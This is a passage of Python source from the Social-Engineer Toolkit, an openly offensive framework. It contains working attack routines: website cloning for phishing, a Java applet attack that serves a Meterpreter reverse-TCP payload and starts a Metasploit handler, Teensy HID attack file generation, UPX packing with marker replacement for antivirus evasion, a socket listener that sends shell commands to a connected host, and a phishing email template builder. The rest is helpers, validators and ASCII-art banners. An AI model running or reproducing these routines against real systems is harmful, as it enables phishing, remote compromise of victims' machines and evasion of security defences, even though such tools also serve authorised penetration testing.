print_status("The updating has finished, returning to main menu..")
time.sleep(2)
#
# Pull the help menu here
#
def help_menu():
fileopen = open("README.md", "r").readlines()
for line in fileopen:
line = line.rstrip()
print(line)
fileopen = open("readme/CREDITS", "r").readlines()
print("\n")
for line in fileopen:
line = line.rstrip()
print(line)
return_continue()
#
# This is a small area to generate the date and time
#
def date_time():
now = str(datetime.datetime.today())
return now
#
# generate a random string
#
def generate_random_string(low, high):
length = random.randint(low, high)
letters = string.ascii_letters # + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
#
# clone JUST a website, and export it.
# Will do no additional attacks.
#
def site_cloner(website, exportpath, *args):
    ipaddr = grab_ipaddress()
filewrite = open(userconfigpath + "interface", "w")
filewrite.write(ipaddr)
filewrite.close()
filewrite = open(userconfigpath + "ipaddr", "w")
filewrite.write(ipaddr)
filewrite.close()
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("URL=" + website)
filewrite.close()
# if we specify a second argument this means we want to use java applet
if args[0] == "java":
# needed to define attack vector
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("java")
filewrite.close()
sys.path.append("src/webattack/web_clone")
# if we are using menu mode we reload just in case
try:
debug_msg("setcore", "importing 'src.webattack.web_clone.cloner'", 1)
module_reload(cloner)
except:
debug_msg("setcore", "importing 'src.webattack.web_clone.cloner'", 1)
import cloner
# copy the file to a new folder
print_status("Site has been successfully cloned and is: " + exportpath)
subprocess.Popen("mkdir '%s';cp %s/web_clone/* '%s'" % (exportpath, userconfigpath,
exportpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
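# Illustrative call of site_cloner (the URL and export path are example
# values only):
#
#   site_cloner("https://www.example.com", "/root/cloned_site", "")
#
# The third argument is required because the function indexes args[0]; pass
# "java" instead of "" to have the clone prepped for the Java applet attack.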
#
# This will start a web server in the directory root you specify, so for example
# you clone a website then run it in that web server, it will pull any index.html file
#
def start_web_server(directory):
try:
# import the threading, socketserver, and simplehttpserver
import socketserver
import http.server
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind
# to port
class ReusableTCPServer(socketserver.TCPServer):
allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(
("0.0.0.0", 80), http.server.SimpleHTTPRequestHandler)
# thread this mofo
os.chdir(directory)
thread.start_new_thread(httpd.serve_forever, ())
# handle keyboard interrupts
except KeyboardInterrupt:
print_info("Exiting the SET web server...")
httpd.socket.close()
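# Illustrative call (the directory is an example value): serve a previously
# cloned site in the background on 0.0.0.0:80 while SET keeps running:
#
#   start_web_server(userconfigpath + "web_clone/")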
#
# this will start a web server without threads
#
def start_web_server_unthreaded(directory):
try:
# import the threading, socketserver, and simplehttpserver
import thread
import socketserver
import http.server
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind
# to port
class ReusableTCPServer(socketserver.TCPServer):
allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(
("0.0.0.0", 80), http.server.SimpleHTTPRequestHandler)
# thread this mofo
os.chdir(directory)
httpd.serve_forever()
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
print_info("Exiting the SET web server...")
httpd.socket.close()
#
# This will create the java applet attack from start to finish.
# Includes payload (reverse_meterpreter for now) cloning website
# and additional capabilities.
#
def java_applet_attack(website, port, directory):
# create the payload
meterpreter_reverse_tcp_exe(port)
# clone the website and inject java applet
site_cloner(website, directory, "java")
# this part is needed to rename the msf.exe file to a randomly generated
# one
filename = check_options("MSF.EXE=")
    if filename != 0:
# move the file to the specified directory and filename
subprocess.Popen("cp %s/msf.exe %s/%s" % (userconfigpath, directory, filename),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
applet_name = check_options("APPLET_NAME=")
if applet_name == "":
applet_name = generate_random_string(6, 15) + ".jar"
# lastly we need to copy over the signed applet
subprocess.Popen(
"cp %s/Signed_Update.jar %s/%s" % (userconfigpath, directory, applet_name),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# start the web server by running it in the background
start_web_server(directory)
# run multi handler for metasploit
print_info("Starting the multi/handler through Metasploit...")
metasploit_listener_start("windows/meterpreter/reverse_tcp", port)
#
# this will create a raw PDE file for you to use in your teensy device
#
#
def teensy_pde_generator(attack_method):
# grab the ipaddress
ipaddr = grab_ipaddress()
# if we are doing the attack vector teensy beef
if attack_method == "beef":
# specify the filename
filename = open("src/teensy/beef.ino", "r")
filewrite = open(userconfigpath + "reports/beef.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Beef Attack Vector under %s/reports/beef.ino" % (userconfigpath))
    # if we are doing the attack vector teensy powershell_down
if attack_method == "powershell_down":
# specify the filename
filename = open("src/teensy/powershell_down.ino", "r")
filewrite = open(userconfigpath + "reports/powershell_down.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/powershell_down.ino" % (userconfigpath))
# if we are doing the attack vector teensy
if attack_method == "powershell_reverse":
# specify the filename
filename = open("src/teensy/powershell_reverse.ino", "r")
filewrite = open(userconfigpath + "reports/powershell_reverse.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/powershell_reverse.ino" % (userconfigpath))
    # if we are doing the attack vector teensy java_applet
if attack_method == "java_applet":
# specify the filename
filename = open("src/teensy/java_applet.ino", "r")
filewrite = open(userconfigpath + "reports/java_applet.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/java_applet.ino" % (userconfigpath))
# if we are doing the attack vector teensy
if attack_method == "wscript":
# specify the filename
filename = open("src/teensy/wscript.ino", "r")
filewrite = open(userconfigpath + "reports/wscript.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/wscript.ino" % (userconfigpath))
# All the options share this code except binary2teensy
if attack_method != "binary2teensy":
for line in filename:
line = line.rstrip()
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
            filewrite.write(line + "\n")
        filewrite.close()
# binary2teensy method
if attack_method == "binary2teensy":
# specify the filename
import src.teensy.binary2teensy
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/binary2teensy.ino" % (userconfigpath))
print_status(teensy_string)
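# Illustrative call (the attack method must match one of the branches above):
#
#   teensy_pde_generator("powershell_down")
#
# The resulting .ino file is written under the reports/ directory in the SET
# user config path and can be loaded onto a Teensy board with the
# Arduino/Teensyduino toolchain.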
#
# Expand the filesystem windows directory
#
def windows_root():
return os.environ['WINDIR']
#
# core log file routine for SET
#
def log(error):
try:
# open log file only if directory is present (may be out of directory
# for some reason)
if not os.path.isfile("%s/src/logs/set_logfile.log" % (definepath())):
filewrite = open("%s/src/logs/set_logfile.log" %
(definepath()), "w")
filewrite.write("")
filewrite.close()
if os.path.isfile("%s/src/logs/set_logfile.log" % (definepath())):
error = str(error)
# open file for writing
filewrite = open("%s/src/logs/set_logfile.log" %
(definepath()), "a")
# write error message out
filewrite.write("ERROR: " + date_time() + ": " + error + "\n")
# close the file
filewrite.close()
except IOError as err:
pass
#
# upx encoding and modify binary
#
def upx(path_to_file):
# open the set_config
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("UPX_PATH=", line)
if match:
upx_path = line.replace("UPX_PATH=", "")
# if it isn't there then bomb out
if not os.path.isfile(upx_path):
print_warning(
"UPX was not detected. Try configuring the set_config again.")
# if we detect it
if os.path.isfile(upx_path):
print_info(
"Packing the executable and obfuscating PE file randomly, one moment.")
# packing executable
subprocess.Popen(
"%s -9 -q -o %s/temp.binary %s" % (upx_path, userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# move it over the old file
subprocess.Popen("mv %s/temp.binary %s" % (userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# random string
random_string = generate_random_string(3, 3).upper()
        # replace the first four occurrences of the "UPX" stub marker - open the file
        fileopen = open(path_to_file, "rb")
        filewrite = open(userconfigpath + "temp.binary", "wb")
        # read the file open for data
        data = fileopen.read()
        # replacing the UPX stub string makes for better A/V evasion
        filewrite.write(data.replace(b"UPX", random_string.encode(), 4))
filewrite.close()
# copy the file over
subprocess.Popen("mv %s/temp.binary %s" % (userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
time.sleep(3)
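# Illustrative call (the path is an example value): pack a freshly generated
# payload sitting in the SET working directory:
#
#   upx(userconfigpath + "msf.exe")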
def show_banner(define_version, graphic):
if graphic == "1":
if check_os() == "posix":
os.system("clear")
if check_os() == "windows":
os.system("cls")
show_graphic()
else:
os.system("clear")
print(bcolors.BLUE + """
[---] The Social-Engineer Toolkit (""" + bcolors.YELLOW + """SET""" + bcolors.BLUE + """) [---]
[---] Created by:""" + bcolors.RED + """ David Kennedy """ + bcolors.BLUE + """(""" + bcolors.YELLOW + """ReL1K""" + bcolors.BLUE + """) [---]
Version: """ + bcolors.RED + """%s""" % (define_version) + bcolors.BLUE + """
Codename: '""" + bcolors.YELLOW + """Maverick""" + bcolors.ENDC + bcolors.BLUE + """'
[---] Follow us on Twitter: """ + bcolors.PURPLE + """@TrustedSec""" + bcolors.BLUE + """ [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE + """@HackingDave""" + bcolors.BLUE + """ [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE + """ [---]
""" + bcolors.GREEN + """ Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
""")
print(bcolors.BOLD + """ The Social-Engineer Toolkit is a product of TrustedSec.\n\n Visit: """ +
bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC)
print(bcolors.BLUE + """ It's easy to update using the PenTesters Framework! (PTF)\nVisit """ + bcolors.YELLOW +
"""https://github.com/trustedsec/ptf""" + bcolors.BLUE + """ to update all your tools!\n\n""" + bcolors.ENDC)
# here we check if there is a new version of SET - if there is, then
# display a banner
cv = get_version()
# pull version
try:
version = ""
def pull_version():
if not os.path.isfile(userconfigpath + "version.lock"):
try:
url = (
'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version')
version = urlopen(url).read().rstrip().decode('utf-8')
filewrite = open(userconfigpath + "version.lock", "w")
filewrite.write(version)
filewrite.close()
except KeyboardInterrupt:
version = "keyboard interrupt"
else:
version = open(userconfigpath + "version.lock", "r").read()
if cv != version:
if version != "":
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN +
"\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
# why urllib and sockets cant control DNS resolvers is beyond me - so
# we use this as a hack job to add a delay and kill if updates are
# taking too long
p = multiprocessing.Process(target=pull_version)
#p.start()
# Wait for 5 seconds or until process finishes
#p.join(8)
# If thread is still active
if p.is_alive():
print(
bcolors.RED + " Unable to check for new version of SET (is your network up?)\n" + bcolors.ENDC)
# terminate the process
p.terminate()
p.join()
except Exception as err:
print(err)
# pass
def show_graphic():
menu = random.randrange(2, 15)
if menu == 2:
print(bcolors.YELLOW + r"""
_,._
__.' _)
<_,)'.-"a\
/' ( \
_.-----..,-' (`"--^
// |
(| `; , |
\ ;.----/ ,/
) // / | |\ \
\ \\`\ | |/ / Jesus Christ
\ \\ \ | |\/ Lamb that was slain.
`" `" `"` """ + bcolors.ENDC)
return
if menu == 3:
print(bcolors.GREEN + r"""
_ xxxx _
/_;-.__ / _\ _.-;_\
`-._`'`_/'`.-'
`\ /`
| /
/-.(
\_._\
\ \`;
> |/
/ //
|//
\(\ """ + bcolors.ENDC)
return
if menu == 4:
print(bcolors.BLUE + r"""
, ,
/////|
///// |
///// |
|~~~| | |
|===| |/|
| B |/| |
| I | | |
| B | | |
| L | /
| E | /
|===|/
'---'
Jesus love's u.
""" + bcolors.ENDC)
if menu == 5:
print(bcolors.RED + r"""
__ _____ _____ _ _
__| |___ ___ _ _ ___| | | |___|_|___| |_
| | | -_|_ -| | |_ -| --| | _| |_ -| _|
|_____|___|___|___|___|_____|__|__|_| |_|___|_|
""" + bcolors.ENDC)
return
if menu == 6:
print(bcolors.PURPLE + r"""
|
\ /
.---.
'-. | | .-'
___| |___
-= [ ] =-
`---. .---'
__||__ | | __||__
'-..-' | | '-..-'
|| | | ||
||_.-| |-,_||
.-"` `"`'` `"-.
.' '.""" + bcolors.ENDC)
return
if menu == 7:
print(bcolors.YELLOW + r"""⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢀⡈⠛⢿⣿⣶⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀
⠀⠸⢿⣿⣶⣾⣿⣿⣿⣿⣷⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣴⣾⠇⠀
⠀⠀⢤⣤⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⣠⣤⣴⣶⣶⣾⣿⡿⠟⠋⣁⡀⠀
⠀⠀⠘⢉⣩⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣾⣿⣿⣿⣿⣿⣿⣿⣿⣟⠛⠛⠁⠀
⠀⠀⠀⠈⠻⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⣿⣿⣿⣿⣿⣿⣿⣟⠿⣿⠃⠀⠀
⠀⠀⠀⠀⠀⠈⠻⠟⣿⣿⣿⣿⣿⣿⣿⣿⣄⣿⣿⣿⣿⣿⣿⣿⣿⡷⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⣉⣽⣿⣿⣿⣿⡿⢻⣿⣿⣿⢿⣿⠎⠉⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢀⣤⣴⣶⣾⣿⣿⣿⣿⣿⣿⣿⣦⡀⠈⠉⠉⠁⠁⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣉⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠙⠋⣽⣿⣟⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⠿⠋⣸⣿⡟⢸⣿⣿⠉⣿⣿⡘⢿⡷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⠀⢸⣿⡏⠀⠸⠿⠃⠀ """ + bcolors.ENDC)
return
if menu == 8:
print(bcolors.RED + r"""
.========. .========.
// I .'..' \ // VI.'.,".\
|| II .'..'| || VII..'..|
|| III .'."| || VIII,'.'|
|| IV ,','.| || IX.'".'.|
|| V '..'.'| || X .'..',|
.\_________/ .\_________/⠀""" + bcolors.ENDC)
if menu == 9:
print(bcolors.YELLOW + r"""
___
_______ /__/
|.-----.| ,---[___]*
|| || / printer
||_____|| _____ / ____
|o_____*| [o_+_+]--------[=i==]
| ________| 850 drive
| __|_
'-/_==_\
/_____\\ """ + bcolors.ENDC)
if menu == 10:
print(bcolors.GREEN + r"""
__________ __________ __________
| |\| | |\
| * * ||| * * * | * ||
| * * ||| | * ||
| * * ||| * * * | * ||
|__________|||__________|__________||
| || `---------------------`
| * * ||
| ||
| * * ||
|__________||
`----------`""" + bcolors.ENDC)
if menu == 11:
print(bcolors.backBlue + r"""
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣿⡆⠀⠙⢿⣿⣒⠦⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⣿⣿⣿⠿⠟⠛⠒⠒⠒⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣾⣿⣿⡿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⠠⠔⠛⠉⠙⠛⢿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⣾⣿⣿⣿⣿⣿⣿⣿⣍⣀⣀⠀⠀⠀⠀⡰⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣎⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡠⠴⠿⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠄⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢀⠎⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣤⣀⠀⠀⠀⠀⢀⣠⣾⠕⠁⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⡠⢁⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⡉⠉⠉⠙⠛⠋⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⢀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣅⡒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢀⣾⣿⠟⢻⠟⠁⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠊
⢀⡾⠋⠀⠀⠀⠀⠀⠀⢀⡨⣻⠋⠸⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣦⡤⠤⢄⡒⠯⠖⠁
⠘⠁⠀⠀⠀⠀⠀⠀⠴⢫⠞⠁⠀⠀⠀⠀⠀⠀⠉⠉⠙⠛⠻⣿⣿⣿⠿⣿⣿⢿⣿⣿⢿⣿⣿⣿⣿⡿⢿⣿⣿⢿⣿⣟⢻⣿⣿⡛⠻⠷⠬⠉⠁⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠀⠁⠀⠉⠀⠈⠉⠀⠈⠉⠀⠉⠉⠀⠉⠉⠀⠉⠛⠢⠈⠉⠙⠂""" + bcolors.ENDC)
if menu == 12:
print(bcolors.YELLOW + r"""
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|⠀⠀
""")
if menu == 13:
print(bcolors.RED + r"""
.---------.
|.-------.|
||>run# ||
|| ||
|"-------'|
.-^---------^-.
| ---~ AFRIC|
"-------------'""" + bcolors.ENDC)
if menu == 14:
print(bcolors.BOLD + """
.----.
.---------. | == |
|.-"'''"-.| |----|
|| || | == |
|| || |----|
|'-.....-'| |::::|
`"")---(""` |___.|
/:::::::::::\" _ "
/:::=======:::\`\`\
`'''''''''''''` '-'
""" + bcolors.ENDC)
#
# identify if set interactive shells are disabled
#
def set_check():
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
match = re.search("SET_INTERACTIVE_SHELL=OFF", line)
# if we turned it off then we return a true else return false
if match:
return True
match1 = re.search("SET_INTERACTIVE_SHELL=ON", line)
# return false otherwise
if match1:
return False
# if the user specifies 0
def menu_back():
print_info("Returning to the previous menu...")
# used to generate random templates for the phishing schema
def custom_template():
try:
print (" [****] Custom Template Generator [****]\n")
print (
"Always looking for new templates! In the set/src/templates directory send an email\nto [email protected] if you got a good template!")
author = raw_input(setprompt("0", "Enter the name of the author"))
filename = randomgen = random.randrange(1, 99999999999999999999)
filename = str(filename) + (".template")
subject = raw_input(setprompt("0", "Enter the subject of the email"))
try:
body = raw_input(setprompt(
"0", "Enter the body of the message, hit return for a new line. Control+c when finished: "))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body += (r"\n")
body += raw_input("Next line of the body: ")
except KeyboardInterrupt:
break
except KeyboardInterrupt:
pass
filewrite = open("src/templates/%s" % (filename), "w")
filewrite.write("# Author: " + author + "\n#\n#\n#\n")
filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
filewrite.write('BODY=' + '"' + body + '"\n')
print("\n")
filewrite.close()
except Exception as e:
print_error("ERROR:An error occured:")
print(bcolors.RED + "ERROR:" + str(e) + bcolors.ENDC)
# routine for checking length of a payload: variable equals max choice
def check_length(choice, max):
    # start initial loop
counter = 0
while 1:
if counter == 1:
choice = raw_input(bcolors.YELLOW + bcolors.BOLD +
"[!] " + bcolors.ENDC + "Invalid choice try again: ")
# try block in case its not a integer
try:
# check to see if its an integer
choice = int(choice)
# okay its an integer lets do the compare
if choice > max:
# trigger an exception as not an int
choice = "blah"
choice = int(choice)
            # if everything is good return the right choice
            return choice
        # oops, not an integer
except Exception:
counter = 1
# valid if IP address is legit
def is_valid_ip(ip):
return is_valid_ipv4(ip) or is_valid_ipv6(ip)
# ipv4
def is_valid_ipv4(ip):
pattern = re.compile(r"""
^
(?:
# Dotted variants:
(?:
# Decimal 1-255 (no leading 0's)
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's)
|
0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)
)
(?: # Repeat 0-3 times, separated by a dot
\.
(?:
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2}
|
0+[1-3]?[0-7]{0,2}
)
){0,3}
|
0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff
|
0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777
|
# Decimal notation, 1-4294967295:
429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}|
42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}|
4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8}
)
$
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(ip) is not None
# ipv6
def is_valid_ipv6(ip):
"""Validates IPv6 addresses.
"""
pattern = re.compile(r"""
^
\s* # Leading whitespace
            (?!.*::.*::)                # Only a single wildcard allowed
(?:(?!:)|:(?=:)) # Colon iff it would be part of a wildcard
(?: # Repeat 6 times:
[0-9a-f]{0,4} # A group of at most four hexadecimal digits
                (?:(?<=::)|(?<!::):)    #   Colon unless preceded by wildcard
){6} #
(?: # Either
[0-9a-f]{0,4} # Another group
                (?:(?<=::)|(?<!::):)    #   Colon unless preceded by wildcard
[0-9a-f]{0,4} # Last group
                (?: (?<=::)             #   Colon iff preceded by exactly one colon
| (?<!:) #
| (?<=:) (?<!::) : #
) # OR
| # A v4 address with NO leading zeros
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
(?: \.
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
){3}
)
\s* # Trailing whitespace
$
""", re.VERBOSE | re.IGNORECASE | re.DOTALL)
return pattern.match(ip) is not None
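# Editor's illustrative sketch (not called by SET): the validators above accept
# dotted-quad IPv4 (including hex/octal/plain-integer forms) and RFC 4291 IPv6
# text; the sample addresses are hypothetical.
def _example_ip_validation():
    assert is_valid_ip("192.168.1.1")
    assert is_valid_ip("fe80::1")
    assert not is_valid_ip("not.an.ip.address")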
# kill certain processes
def kill_proc(port, flag):
proc = subprocess.Popen("netstat -antp | grep '%s'" %
(port), shell=True, stdout=subprocess.PIPE)
    # communicate() returns bytes on Python 3, so decode before regex matching
    stdout_value = proc.communicate()[0].decode("utf-8", "ignore")
    a = re.search(r"\d+/%s" % (flag), stdout_value)
if a:
b = a.group()
b = b.replace("/%s" % (flag), "")
subprocess.Popen("kill -9 %s" % (b), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True).wait()
# check the config file and return value
def check_config(param):
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
line = line.rstrip()
# print line
        # if the line is a comment then ignore it, otherwise check whether it
        # starts with the parameter we want
        if not line.startswith("#"):
            if line.startswith(param):
line = line.rstrip()
# remove any quotes or single quotes
line = line.replace('"', "")
line = line.replace("'", "")
line = line.split("=", 1)
return line[1]
# copy an entire folder function
def copyfolder(sourcePath, destPath):
for root, dirs, files in os.walk(sourcePath):
# figure out where we're going
dest = destPath + root.replace(sourcePath, '')
# if we're in a directory that doesn't exist in the destination folder
# then create a new folder
if not os.path.isdir(dest):
os.mkdir(dest)
# loop through all files in the directory
for f in files:
# compute current (old) & new file locations
oldLoc = root + '/' + f
newLoc = dest + '/' + f
if not os.path.isfile(newLoc):
try:
shutil.copy2(oldLoc, newLoc)
except IOError:
pass
# this routine will be used to check config options within the set.options
def check_options(option):
# open the directory
trigger = 0
if os.path.isfile(userconfigpath + "set.options"):
fileopen = open(userconfigpath + "set.options", "r").readlines()
for line in fileopen:
match = re.search(option, line)
if match:
line = line.rstrip()
line = line.replace('"', "")
line = line.split("=")
return line[1]
trigger = 1
if trigger == 0:
return trigger
# future home to update one localized set configuration file
def update_options(option):
# if the file isn't there write a blank file
if not os.path.isfile(userconfigpath + "set.options"):
filewrite = open(userconfigpath + "set.options", "w")
filewrite.write("")
filewrite.close()
# remove old options
fileopen = open(userconfigpath + "set.options", "r")
old_options = ""
for line in fileopen:
match = re.search(option, line)
if match:
line = ""
old_options = old_options + line
# append to file
filewrite = open(userconfigpath + "set.options", "w")
filewrite.write(old_options + "\n" + option + "\n")
filewrite.close()
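# Editor's illustrative usage sketch (hypothetical option name):
#   update_options("EXAMPLE_OPTION=12345")   # appends the pair to ~/.set/set.options
#   check_options("EXAMPLE_OPTION=")         # -> "12345"; returns 0 if never stored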
# python socket listener
def socket_listener(port):
port = int(port) # needed integer for port
host = '' # Symbolic name meaning the local host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# set is so that when we cancel out we can reuse port
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
print("Listening on 0.0.0.0:%s" % str(port))
    # listen for only 1000 connections
s.listen(1000)
conn, addr = s.accept()
print('Connected by', addr)
data = conn.recv(1024)
# start loop
while 1:
        command = raw_input("Enter shell command or quit: ")
        # sockets expect bytes on Python 3
        conn.send(command.encode("utf-8"))
# if we specify quit then break out of loop and close socket
if command == "quit":
break
data = conn.recv(1024)
print(data)
conn.close()
# generates powershell payload
def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
# generate our shellcode first
